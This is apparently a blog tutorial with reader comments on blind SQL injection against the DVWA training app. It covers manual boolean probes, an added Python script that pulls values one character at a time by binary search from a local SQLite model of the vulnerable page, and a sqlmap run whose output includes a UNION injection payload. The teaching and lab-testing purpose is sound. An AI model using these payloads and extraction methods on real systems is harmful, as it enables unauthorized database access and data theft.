Blind SQL injection
A web application that is vulnerable to SQL injection may display a SQL error that looks like this:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

This error tells the attacker two things: the application is vulnerable to injection, and the DBMS is MySQL.
When the application does not show the SQL error message after an injection attempt, the injection is called blind SQL injection. The injected query still runs; the attacker just has to infer its result from indirect signals, such as whether the page content changes (boolean-based) or how long the response takes (time-based).
Reference: OWASP – Blind SQL injection.
Manual testing
A manual test starts by submitting deliberately incomplete syntax, for example a single quote:

a'

and pressing Submit. Because no SQL syntax error is displayed, it is hard to tell whether the application is susceptible to SQLi; a further test with a syntactically complete query is needed.

Testing with a query that is valid once injected, like

' or 1=1#

makes the WHERE clause always true (1=1), so the application responds as it would for a valid ID instead of treating the input as unknown; the # comments out the rest of the original query, including its closing quote. Comparing that response with the one for a condition that is always false (for example ' or 1=2#) is what makes a blind injection testable: the two pages differ even though neither shows an error.
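What an attacker can still do once errors are hidden, as an added example that is not part of the original post or of DVWA's code: the script below models the blind page over an in-memory SQLite table (constructed here; the rows and column names are invented) and then extracts the DBMS version and a user's first name one character at a time through yes/no questions. SQLite stands in for MySQL, so the # comment from the page becomes -- and ascii()/substring() become unicode()/substr(); the inference itself is the boolean-based technique that sqlmap lists in its output.

```python
import sqlite3

# Added example, not DVWA's code. An in-memory SQLite database stands in for the
# MySQL users table behind DVWA's sqli_blind page; the rows and column names below
# are constructed for this example.
SAMPLE_USERS = [("1", "admin", "admin"), ("2", "Gordon", "Brown"), ("3", "Pablo", "Picasso")]


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id TEXT, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def blind_page(conn, user_id):
    """Model of the vulnerable page: the id is concatenated into the query (the bug),
    database errors are swallowed, and the caller only learns exists / missing."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    try:
        return len(conn.execute(sql).fetchall()) > 0
    except sqlite3.Error:
        return False  # the syntax error is hidden, so a' looks exactly like a missing id


def ask(conn, condition):
    """One yes/no question to the database (one HTTP request in a real attack).
    The trailing '-- ' comment plays the role of MySQL's '#' on the page."""
    return blind_page(conn, f"1' AND ({condition})-- ")


def extract_string(conn, subquery, lo=32, hi=126):
    """Boolean-based blind extraction of the single string returned by `subquery`.
    Each character is found by binary search over printable ASCII (lo..hi), which
    costs at most 7 questions per character plus one length check per position.
    unicode()/substr() are SQLite's names for MySQL's ascii()/substring().
    Returns (extracted_string, number_of_questions_asked)."""
    result, questions, pos = "", 0, 1
    while True:
        questions += 1
        if not ask(conn, f"length(({subquery})) >= {pos}"):
            return result, questions
        low, high = lo, hi
        while low < high:
            mid = (low + high) // 2
            questions += 1
            if ask(conn, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                low = mid + 1
            else:
                high = mid
        result += chr(low)
        pos += 1


if __name__ == "__main__":
    db = build_db()
    # The manual probes from the page: the broken one is indistinguishable from a miss.
    print("a'          ->", blind_page(db, "a'"))
    print("' or 1=1--  ->", blind_page(db, "' OR 1=1-- "))
    print("' or 1=2--  ->", blind_page(db, "' OR 1=2-- "))
    # Fingerprint the DBMS and pull a value without ever seeing query output.
    print(extract_string(db, "SELECT sqlite_version()"))
    print(extract_string(db, "SELECT first_name FROM users WHERE user_id = '1'"))
```

Run it with python3: it prints the answers to the page's three manual probes and the two extracted strings together with the number of questions each cost. Binary search over the 95 printable characters needs at most 7 questions per character, so even this simple loop pulls a value out of a page that never shows query output. When the page gives no visible difference at all, a time-based variant replaces the exists/missing signal with a delay (MySQL's SLEEP()) and measures the response time instead.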
Automated injection example: sqlmap
Use Burp Suite to intercept the HTTP request and read the session cookie; alternatively you can use Tamper Data. Type anything in the box and click Submit, and the intercepted request will show the Cookie header. sqlmap needs this cookie because DVWA only serves the page to a logged-in session (PHPSESSID) and takes the security level from the security cookie. After you have the cookie value, you can use sqlmap to test for injection like this:
/pentest/database/sqlmap# ./sqlmap.py -u "http://172.16.0.4/dvwa/vulnerabilities/sqli_blind/?id=a&Submit=Submit" --cookie="security=low; PHPSESSID=ut8273jfu66ani571dssd1s6p0"

By default sqlmap tries all of its techniques, including error-based and UNION queries; to limit it to the blind ones, add --technique=BT (boolean-based and time-based).

The results are these:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://172.16.0.4/dvwa/vulnerabilities/sqli_blind/?id=a&Submit=Submit" --cookie="security=low; PHPSESSID=ut8273jfu66ani571dssd1s6p0"

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:23:43

[23:23:44] [INFO] testing connection to the target url
[23:23:44] [INFO] testing if the url is stable, wait a few seconds
[23:23:45] [INFO] url is stable
[23:23:45] [INFO] testing if GET parameter 'id' is dynamic
[23:23:46] [WARNING] GET parameter 'id' appears to be not dynamic
[23:23:46] [WARNING] reflective value(s) found and filtering out
[23:23:46] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[23:23:46] [INFO] testing for SQL injection on GET parameter 'id'
[23:23:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:23:46] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[23:23:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:23:47] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[23:23:47] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[23:23:47] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:23:47] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[23:23:47] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:23:47] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:23:47] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[23:23:48] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[23:23:48] [INFO] testing 'Oracle AND time-based blind'
[23:23:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:23:49] [INFO] target url appears to be UNION injectable with 2 columns
[23:23:49] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 120 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=a' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a686b633a,0x61484d4c475865765959,0x3a757a643a)#&Submit=Submit
---
[23:23:55] [INFO] testing MySQL
[23:23:55] [INFO] confirming MySQL
[23:23:55] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian or Ubuntu 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.0
[23:23:55] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/172.16.0.4'

[*] shutting down at 23:23:55

root@bt:/pentest/database/sqlmap#
Good post 😉
There are much faster ways of extracting data via blind injection. As it stands, with MySQL DBs you should be able to extract one character in about 7 requests; if you are extracting chars in [a-zA-Z] you should be able to extract them in only 6 requests per char.
For more check out my blog post on blind MySQL injection —> http://k3170makan.blogspot.com/2012/01/bit-shifting-blind-injection-simplified.html
Hi K3170Makan! Thanks for visiting! I have read your article about bit shifting… but I do not quite get it… I browsed your blog a bit and found you have extensive posts about Google dorking, which are sooo useful and interesting… :D I would like to add your blog to my blogroll 😀